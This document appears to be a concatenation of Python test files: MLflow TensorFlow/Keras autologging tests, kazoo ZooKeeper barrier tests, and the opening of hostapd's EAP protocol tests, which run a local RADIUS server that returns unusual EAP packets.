data, labels, epochs=initial_epoch + 10, callbacks=[callback], initial_epoch=initial_epoch
)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id), history, callback
@pytest.fixture
def tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
callback,
restore_weights,
patience,
initial_epoch,
):
return get_tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
callback,
restore_weights,
patience,
initial_epoch,
)
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [0, 1, 5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_logs(tf_keras_random_data_run_with_callback, initial_epoch):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" in metrics
assert "restored_epoch" in metrics
restored_epoch = int(metrics["restored_epoch"])
# In this test, the best epoch is always the first epoch because the early stopping callback
# never observes a loss improvement due to an extremely large `min_delta` value
assert restored_epoch == initial_epoch
assert "loss" in history.history
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check that MLflow has logged the metrics of the "best" model, in addition to per-epoch metrics
loss = history.history["loss"]
assert len(metric_history) == len(loss) + 1
steps, values = map(list, zip(*[(m.step, m.value) for m in metric_history]))
# Check that MLflow has logged the correct steps
assert steps == [*history.epoch, callback.stopped_epoch + 1]
# Check that MLflow has logged the correct metric values
np.testing.assert_allclose(values, [*loss, callback.best])
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [0, 1, 5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_batch_metrics_logger_logs_expected_metrics(
callback,
restore_weights,
patience,
initial_epoch,
random_train_data,
random_one_hot_labels,
):
patched_metrics_data = []
# Mock patching BatchMetricsLogger.record_metrics()
# to ensure that expected metrics are being logged.
original = BatchMetricsLogger.record_metrics
with patch(
"mlflow.utils.autologging_utils.BatchMetricsLogger.record_metrics", autospec=True
) as record_metrics_mock:
def record_metrics_side_effect(self, metrics, step=None):
patched_metrics_data.extend(metrics.items())
original(self, metrics, step)
record_metrics_mock.side_effect = record_metrics_side_effect
run, _, callback = get_tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
callback,
restore_weights,
patience,
initial_epoch,
)
patched_metrics_data = dict(patched_metrics_data)
original_metrics = run.data.metrics
for metric_name in original_metrics:
assert metric_name in patched_metrics_data
restored_epoch = int(patched_metrics_data["restored_epoch"])
assert restored_epoch == initial_epoch
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [11])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_no_stop_does_not_log(tf_keras_random_data_run_with_callback):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" not in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == 10
assert len(metric_history) == num_of_epochs
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [False])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_no_restore_doesnt_log(tf_keras_random_data_run_with_callback):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == callback.patience + 1
assert len(metric_history) == num_of_epochs
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [False])
@pytest.mark.parametrize("callback", ["not-early"])
@pytest.mark.parametrize("patience", [5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_non_early_stop_callback_no_log(tf_keras_random_data_run_with_callback):
run, history = tf_keras_random_data_run_with_callback[:-1]
metrics = run.data.metrics
params = run.data.params
assert "patience" not in params
assert "monitor" not in params
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" not in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == 10
assert len(metric_history) == num_of_epochs
@pytest.mark.parametrize("positional", [True, False])
def test_tf_keras_autolog_does_not_mutate_original_callbacks_list(
tmpdir, random_train_data, random_one_hot_labels, positional
):
"""
TensorFlow autologging passes new callbacks to the `fit()` / `fit_generator()` function. If
preexisting user-defined callbacks already exist, these new callbacks are added to the
user-specified ones. This test verifies that the new callbacks are added to the without
permanently mutating the original list of callbacks.
"""
mlflow.tensorflow.autolog()
tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=tmpdir)
callbacks = [tensorboard_callback]
model = create_tf_keras_model()
data = random_train_data
labels = random_one_hot_labels
if positional:
model.fit(data, labels, None, 10, 1, callbacks)
else:
model.fit(data, labels, epochs=10, callbacks=callbacks)
assert len(callbacks) == 1
assert callbacks == [tensorboard_callback]
@pytest.mark.large
def test_tf_keras_autolog_does_not_delete_logging_directory_for_tensorboard_callback(
tmpdir, random_train_data, random_one_hot_labels
):
tensorboard_callback_logging_dir_path = str(tmpdir.mkdir("tb_logs"))
tensorboard_callback = tf.keras.callbacks.TensorBoard(
tensorboard_callback_logging_dir_path, histogram_freq=0
)
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10, callbacks=[tensorboard_callback])
assert os.path.exists(tensorboard_callback_logging_dir_path)
@pytest.mark.large
def test_tf_keras_autolog_logs_to_and_deletes_temporary_directory_when_tensorboard_callback_absent(
tmpdir, random_train_data, random_one_hot_labels
):
from unittest import mock
from mlflow.tensorflow import _TensorBoardLogDir
mlflow.tensorflow.autolog()
mock_log_dir_inst = _TensorBoardLogDir(location=str(tmpdir.mkdir("tb_logging")), is_temp=True)
with mock.patch("mlflow.tensorflow._TensorBoardLogDir", autospec=True) as mock_log_dir_class:
mock_log_dir_class.return_value = mock_log_dir_inst
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
assert not os.path.exists(mock_log_dir_inst.location)
def create_tf_estimator_model(directory, export, training_steps=100, use_v1_estimator=False):
CSV_COLUMN_NAMES = ["SepalLength", "SepalWidth", "PetalLength", "PetalWidth", "Species"]
train = pd.read_csv(
os.path.join(os.path.dirname(__file__), "iris_training.csv"),
names=CSV_COLUMN_NAMES,
header=0,
)
train_y = train.pop("Species")
def input_fn(features, labels, training=True, batch_size=256):
"""An input function for training or evaluating"""
# Convert the inputs to a Dataset.
dataset = tf.data.Dataset.from_tensor_slices((dict(features), labels))
# Shuffle and repeat if you are in training mode.
if training:
dataset = dataset.shuffle(1000).repeat()
return dataset.batch(batch_size)
my_feature_columns = []
for key in train.keys():
my_feature_columns.append(tf.feature_column.numeric_column(key=key))
feature_spec = {}
for feature in CSV_COLUMN_NAMES:
feature_spec[feature] = tf.Variable([], dtype=tf.float64, name=feature)
receiver_fn = tf.estimator.export.build_raw_serving_input_receiver_fn(feature_spec)
run_config = tf.estimator.RunConfig(
# Emit loss metrics to TensorBoard every step
save_summary_steps=1,
)
# If flag set to true, then use the v1 classifier that extends Estimator
# If flag set to false, then use the v2 classifier that extends EstimatorV2
if use_v1_estimator:
classifier = tf.compat.v1.estimator.DNNClassifier(
feature_columns=my_feature_columns,
# Two hidden layers of 10 nodes each.
hidden_units=[30, 10],
# The model must choose between 3 classes.
n_classes=3,
model_dir=directory,
config=run_config,
)
else:
classifier = tf.estimator.DNNClassifier(
feature_columns=my_feature_columns,
# Two hidden layers of 10 nodes each.
hidden_units=[30, 10],
# The model must choose between 3 classes.
n_classes=3,
model_dir=directory,
config=run_config,
)
classifier.train(input_fn=lambda: input_fn(train, train_y, training=True), steps=training_steps)
if export:
classifier.export_saved_model(directory, receiver_fn)
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_ends_auto_created_run(tmpdir, export):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export)
assert mlflow.active_run() is None
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_persists_manually_created_run(tmpdir, export):
directory = tmpdir.mkdir("test")
with mlflow.start_run() as run:
create_tf_estimator_model(str(directory), export)
assert mlflow.active_run()
assert mlflow.active_run().info.run_id == run.info.run_id
@pytest.fixture
def tf_estimator_random_data_run(tmpdir, export):
# pylint: disable=unused-argument
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
@pytest.mark.parametrize("use_v1_estimator", [True, False])
def test_tf_estimator_autolog_logs_metrics(tmpdir, export, use_v1_estimator):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog(every_n_iter=5)
with mlflow.start_run():
create_tf_estimator_model(
str(directory), export, use_v1_estimator=use_v1_estimator, training_steps=17
)
run_id = mlflow.active_run().info.run_id
client = mlflow.tracking.MlflowClient()
run = client.get_run(run_id)
assert "loss" in run.data.metrics
assert "steps" in run.data.params
metrics = client.get_metric_history(run_id, "loss")
assert set([metric.step for metric in metrics]) == set([1, 6, 11, 16])
@pytest.mark.large
@pytest.mark.parametrize("export", [True])
def test_tf_estimator_v1_autolog_can_load_from_artifact(tmpdir, export):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export, use_v1_estimator=True)
client = mlflow.tracking.MlflowClient()
tf_estimator_v1_run = client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
artifacts = client.list_artifacts(tf_estimator_v1_run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
mlflow.tensorflow.load_model("runs:/" + tf_estimator_v1_run.info.run_id + "/model")
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_logs_tensorboard_logs(tf_estimator_random_data_run):
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(tf_estimator_random_data_run.info.run_id)
assert any(["tensorboard_logs" in a.path and a.is_dir for a in artifacts])
@pytest.mark.large
def test_tf_estimator_autolog_logs_metrics_in_exclusive_mode(tmpdir):
mlflow.tensorflow.autolog(exclusive=True)
create_tf_estimator_model(tmpdir, export=False)
client = mlflow.tracking.MlflowClient()
tf_estimator_run = client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
assert "loss" in tf_estimator_run.data.metrics
assert "steps" in tf_estimator_run.data.params
metrics = client.get_metric_history(tf_estimator_run.info.run_id, "loss")
assert len(metrics) == 100
@pytest.mark.large
def test_tf_estimator_autolog_logs_metics_for_single_epoch_training(tmpdir):
"""
Epoch indexing behavior is consistent across TensorFlow 2: tf.Keras uses
zero-indexing for epochs, while other APIs (e.g., tf.Estimator) use one-indexing.
This test verifies that metrics are produced for tf.Estimator training sessions
in the boundary casewhere a model is trained for a single epoch, ensuring that
we capture metrics from the first epoch at index 1.
"""
mlflow.tensorflow.autolog()
with mlflow.start_run() as run:
create_tf_estimator_model(str(tmpdir), export=False, training_steps=1)
client = mlflow.tracking.MlflowClient()
metrics = client.get_metric_history(run.info.run_id, "loss")
assert len(metrics) == 1
assert metrics[0].step == 1
@pytest.mark.large
@pytest.mark.parametrize("export", [True])
def test_tf_estimator_autolog_model_can_load_from_artifact(tf_estimator_random_data_run):
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(tf_estimator_random_data_run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
mlflow.tensorflow.load_model("runs:/" + tf_estimator_random_data_run.info.run_id + "/model")
@pytest.mark.large
def test_flush_queue_is_thread_safe():
"""
Autologging augments TensorBoard event logging hooks with MLflow `log_metric` API
calls. To prevent these API calls from blocking TensorBoard event logs, `log_metric`
API calls are scheduled via `_flush_queue` on a background thread. Accordingly, this test
verifies that `_flush_queue` is thread safe.
"""
from threading import Thread
from mlflow.entities import Metric
from mlflow.tensorflow import _flush_queue, _metric_queue_lock
client = mlflow.tracking.MlflowClient()
run = client.create_run(experiment_id="0")
metric_queue_item = (run.info.run_id, Metric("foo", 0.1, 100, 1))
mlflow.tensorflow._metric_queue.append(metric_queue_item)
# Verify that, if another thread holds a lock on the metric queue leveraged by
# _flush_queue, _flush_queue terminates and does not modify the queue
_metric_queue_lock.acquire()
flush_thread1 = Thread(target=_flush_queue)
flush_thread1.start()
flush_thread1.join()
assert len(mlflow.tensorflow._metric_queue) == 1
assert mlflow.tensorflow._metric_queue[0] == metric_queue_item
_metric_queue_lock.release()
# Verify that, if no other thread holds a lock on the metric queue leveraged by
# _flush_queue, _flush_queue flushes the queue as expected
flush_thread2 = Thread(target=_flush_queue)
flush_thread2.start()
flush_thread2.join()
assert len(mlflow.tensorflow._metric_queue) == 0
def get_text_vec_model(train_samples):
# Taken from: https://github.com/mlflow/mlflow/issues/3910
# pylint: disable=no-name-in-module
from tensorflow.keras.layers.experimental.preprocessing import TextVectorization
VOCAB_SIZE = 10
SEQUENCE_LENGTH = 16
EMBEDDING_DIM = 16
vectorizer_layer = TextVectorization(
input_shape=(1,),
max_tokens=VOCAB_SIZE,
output_mode="int",
output_sequence_length=SEQUENCE_LENGTH,
)
vectorizer_layer.adapt(train_samples)
model = tf.keras.Sequential(
[
vectorizer_layer,
tf.keras.layers.Embedding(
VOCAB_SIZE,
EMBEDDING_DIM,
name="embedding",
mask_zero=True,
input_shape=(1,),
),
tf.keras.layers.GlobalAveragePooling1D(),
tf.keras.layers.Dense(16, activation="relu"),
tf.keras.layers.Dense(1, activation="tanh"),
]
)
model.compile(optimizer="adam", loss="mse", metrics="mae")
return model
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.3.0"),
reason=(
"Deserializing a model with `TextVectorization` and `Embedding`"
"fails in tensorflow < 2.3.0. See this issue:"
"https://github.com/tensorflow/tensorflow/issues/38250"
),
)
def test_autolog_text_vec_model(tmpdir):
"""
Verifies autolog successfully saves a model that can't be saved in the H5 format
"""
mlflow.tensorflow.autolog()
train_samples = np.array(["this is an example", "another example"])
train_labels = np.array([0.4, 0.2])
model = get_text_vec_model(train_samples)
# Saving in the H5 format should fail
with pytest.raises(NotImplementedError, match="is not supported in h5"):
model.save(tmpdir.join("model.h5").strpath, save_format="h5")
with mlflow.start_run() as run:
model.fit(train_samples, train_labels, epochs=1)
loaded_model = mlflow.keras.load_model("runs:/" + run.info.run_id + "/model")
np.testing.assert_array_equal(loaded_model.predict(train_samples), model.predict(train_samples))
def test_fit_generator(random_train_data, random_one_hot_labels):
mlflow.tensorflow.autolog()
model = create_tf_keras_model()
def generator():
while True:
yield random_train_data, random_one_hot_labels
with mlflow.start_run() as run:
model.fit_generator(generator(), epochs=10, steps_per_epoch=1)
run = mlflow.tracking.MlflowClient().get_run(run.info.run_id)
params = run.data.params
metrics = run.data.metrics
assert "epochs" in params
assert params["epochs"] == "10"
assert "steps_per_epoch" in params
assert params["steps_per_epoch"] == "1"
assert "accuracy" in metrics
assert "loss" in metrics
@pytest.mark.large
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_fluent_autolog_with_tf_keras_logs_expected_content(
random_train_data, random_one_hot_labels
):
"""
Guards against previously-exhibited issues where using the fluent `mlflow.autolog()` API with
`tf.keras` Models did not work due to conflicting patches set by both the
`mlflow.tensorflow.autolog()` and the `mlflow.keras.autolog()` APIs.
"""
mlflow.autolog()
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(random_train_data, random_one_hot_labels, epochs=10)
client = mlflow.tracking.MlflowClient()
run_data = client.get_run(run.info.run_id).data
assert "accuracy" in run_data.metrics
assert "epochs" in run_data.params
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
def test_callback_is_picklable():
cb = __MLflowTfKeras2Callback(
log_models=True, metrics_logger=BatchMetricsLogger(run_id="1234"), log_every_n_steps=5
)
pickle.dumps(cb)
tb = _TensorBoard()
pickle.dumps(tb)
@pytest.mark.large
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.1.0"), reason="This test requires tensorflow >= 2.1.0"
)
def test_tf_keras_autolog_distributed_training(random_train_data, random_one_hot_labels):
# Ref: https://www.tensorflow.org/tutorials/distribute/keras
mlflow.tensorflow.autolog()
with tf.distribute.MirroredStrategy().scope():
model = create_tf_keras_model()
fit_params = {"epochs": 10, "batch_size": 10}
with mlflow.start_run() as run:
model.fit(random_train_data, random_one_hot_labels, **fit_params)
client = mlflow.tracking.MlflowClient()
assert client.get_run(run.info.run_id).data.params.keys() >= fit_params.keys()
@pytest.mark.large
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.6.0"),
reason=("TensorFlow only has a hard dependency on Keras in version >= 2.6.0"),
)
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_fluent_autolog_with_tf_keras_preserves_v2_model_reference():
"""
Verifies that, in TensorFlow >= 2.6.0, `tensorflow.keras.Model` refers to the correct class in
the correct module after `mlflow.autolog()` is called, guarding against previously identified
compatibility issues between recent versions of TensorFlow and MLflow's internal utility for
setting up autologging import hooks.
"""
mlflow.autolog()
import tensorflow.keras
from keras.api._v2.keras import Model as ModelV2
assert tensorflow.keras.Model is ModelV2
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_tensorflow_with_fluent_autolog_enables_tf_autologging():
mlflow.autolog()
import tensorflow # pylint: disable=unused-variable,unused-import,reimported
assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)
# NB: In Tensorflow >= 2.6, we redirect keras autologging to tensorflow autologging
# so the original keras autologging is disabled
if Version(tf.__version__) >= Version("2.6"):
import keras # pylint: disable=unused-variable,unused-import
assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
@pytest.mark.large
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_tf_keras_with_fluent_autolog_enables_tf_autologging():
mlflow.autolog()
import tensorflow.keras # pylint: disable=unused-variable,unused-import
assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)
# NB: In Tensorflow >= 2.6, we redirect keras autologging to tensorflow autologging
# so the original keras autologging is disabled
if Version(tf.__version__) >= Version("2.6"):
# NB: For TF >= 2.6, import tensorflow.keras will trigger importing keras
assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
@pytest.mark.large
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.6.0"),
reason=("TensorFlow autologging is not used for vanilla Keras models in Keras < 2.6.0"),
)
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_keras_with_fluent_autolog_enables_tensorflow_autologging():
mlflow.autolog()
import keras # pylint: disable=unused-variable,unused-import
assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)
assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
|
test_barrier.py | import threading
from nose.tools import eq_
from kazoo.testing import KazooTestCase
class KazooBarrierTests(KazooTestCase):
def test_barrier_not_exist(self):
b = self.client.Barrier("/some/path")
eq_(b.wait(), True)
def test_barrier_exists(self):
b = self.client.Barrier("/some/path")
b.create()
eq_(b.wait(0), False)
b.remove()
eq_(b.wait(), True)
def test_remove_nonexistent_barrier(self):
b = self.client.Barrier("/some/path")
eq_(b.remove(), False)
class KazooDoubleBarrierTests(KazooTestCase):
def test_basic_barrier(self):
b = self.client.DoubleBarrier("/some/path", 1)
eq_(b.participating, False)
b.enter()
eq_(b.participating, True)
b.leave()
eq_(b.participating, False)
def test_two_barrier(self):
av = threading.Event()
ev = threading.Event()
bv = threading.Event()
release_all = threading.Event()
b1 = self.client.DoubleBarrier("/some/path", 2)
b2 = self.client.DoubleBarrier("/some/path", 2)
def make_barrier_one():
b1.enter()
ev.set()
release_all.wait()
b1.leave()
ev.set()
def make_barrier_two():
bv.wait()
b2.enter()
av.set()
release_all.wait()
b2.leave()
av.set()
# Spin up both of them
t1 = threading.Thread(target=make_barrier_one)
t1.start()
t2 = threading.Thread(target=make_barrier_two)
t2.start()
eq_(b1.participating, False)
eq_(b2.participating, False)
bv.set()
av.wait()
ev.wait()
eq_(b1.participating, True)
eq_(b2.participating, True)
av.clear()
ev.clear()
release_all.set()
av.wait()
ev.wait()
eq_(b1.participating, False)
eq_(b2.participating, False)
t1.join()
t2.join()
def test_three_barrier(self):
av = threading.Event()
ev = threading.Event()
bv = threading.Event()
release_all = threading.Event()
b1 = self.client.DoubleBarrier("/some/path", 3)
b2 = self.client.DoubleBarrier("/some/path", 3)
b3 = self.client.DoubleBarrier("/some/path", 3)
def make_barrier_one():
b1.enter()
ev.set()
release_all.wait()
b1.leave()
ev.set()
def make_barrier_two():
bv.wait()
b2.enter()
av.set()
release_all.wait()
b2.leave()
av.set()
# Spin up both of them
t1 = threading.Thread(target=make_barrier_one)
t1.start()
t2 = threading.Thread(target=make_barrier_two)
t2.start()
eq_(b1.participating, False)
eq_(b2.participating, False)
bv.set()
eq_(b1.participating, False)
eq_(b2.participating, False)
b3.enter()
ev.wait()
av.wait()
eq_(b1.participating, True)
eq_(b2.participating, True)
eq_(b3.participating, True)
av.clear()
ev.clear()
release_all.set()
b3.leave()
av.wait()
ev.wait()
eq_(b1.participating, False)
eq_(b2.participating, False)
eq_(b3.participating, False)
t1.join()
t2.join()
def test_barrier_existing_parent_node(self):
b = self.client.DoubleBarrier('/some/path', 1)
self.assertFalse(b.participating)
self.client.create('/some', ephemeral=True)
# the barrier cannot create children under an ephemeral node
b.enter()
self.assertFalse(b.participating)
def test_barrier_existing_node(self):
b = self.client.DoubleBarrier('/some', 1)
self.assertFalse(b.participating)
self.client.ensure_path(b.path)
self.client.create(b.create_path, ephemeral=True)
# the barrier will re-use an existing node
b.enter()
self.assertTrue(b.participating)
b.leave()
|
test_eap_proto.py | # EAP protocol tests
# Copyright (c) 2014, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import hmac
import logging
logger = logging.getLogger()
import select
import struct
import threading
import time
import hostapd
EAP_CODE_REQUEST = 1
EAP_CODE_RESPONSE = 2
EAP_CODE_SUCCESS = 3
EAP_CODE_FAILURE = 4
EAP_TYPE_IDENTITY = 1
EAP_TYPE_NOTIFICATION = 2
EAP_TYPE_NAK = 3
EAP_TYPE_MD5 = 4
EAP_TYPE_OTP = 5
EAP_TYPE_GTC = 6
EAP_TYPE_TLS = 13
EAP_TYPE_LEAP = 17
EAP_TYPE_SIM = 18
EAP_TYPE_TTLS = 21
EAP_TYPE_AKA = 23
EAP_TYPE_PEAP = 25
EAP_TYPE_MSCHAPV2 = 26
EAP_TYPE_TLV = 33
EAP_TYPE_TNC = 38
EAP_TYPE_FAST = 43
EAP_TYPE_PAX = 46
EAP_TYPE_PSK = 47
EAP_TYPE_SAKE = 48
EAP_TYPE_IKEV2 = 49
EAP_TYPE_AKA_PRIME = 50
EAP_TYPE_GPSK = 51
EAP_TYPE_PWD = 52
EAP_TYPE_EKE = 53
def run_pyrad_server(srv, t_stop, eap_handler):
srv.RunWithStop(t_stop, eap_handler)
def start_radius_server(eap_handler):
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
return None
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
if len(pkt[79]) > 1:
logger.info("Multiple EAP-Message attributes")
# TODO: reassemble
eap = pkt[79][0]
eap_req = self.eap_handler(self.ctx, eap)
reply = self.CreateReplyPacket(pkt)
if eap_req:
if len(eap_req) > 253:
logger.info("Need to fragment EAP-Message")
# TODO: fragment
reply.AddAttribute("EAP-Message", eap_req)
else:
logger.info("No EAP request available")
reply.code = pyrad.packet.AccessChallenge
hmac_obj = hmac.new(reply.secret)
hmac_obj.update(struct.pack("B", reply.code))
hmac_obj.update(struct.pack("B", reply.id))
# reply attributes
reply.AddAttribute("Message-Authenticator",
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
attrs = reply._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(pkt.authenticator)
hmac_obj.update(attrs)
del reply[80]
reply.AddAttribute("Message-Authenticator", hmac_obj.digest())
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_stop, eap_handler):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_stop = t_stop
self.eap_handler = eap_handler
self.ctx = {}
while not t_stop.is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
"radius",
"localhost")
srv.BindToAddress("")
t_stop = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_stop, eap_handler))
t.start()
return { 'srv': srv, 'stop': t_stop, 'thread': t }
def stop_radius_server(srv):
srv['stop'].set()
srv['thread'].join()
def start_ap(ifname):
params = hostapd.wpa2_eap_params(ssid="eap-test")
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(ifname, params)
return hapd
def test_eap_proto(dev, apdev):
"""EAP protocol tests"""
def eap_handler(ctx, req):
logger.info("eap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success - id off by 2")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] + 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success - id off by 3")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] + 2, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('A'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('B'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('C'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('D'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
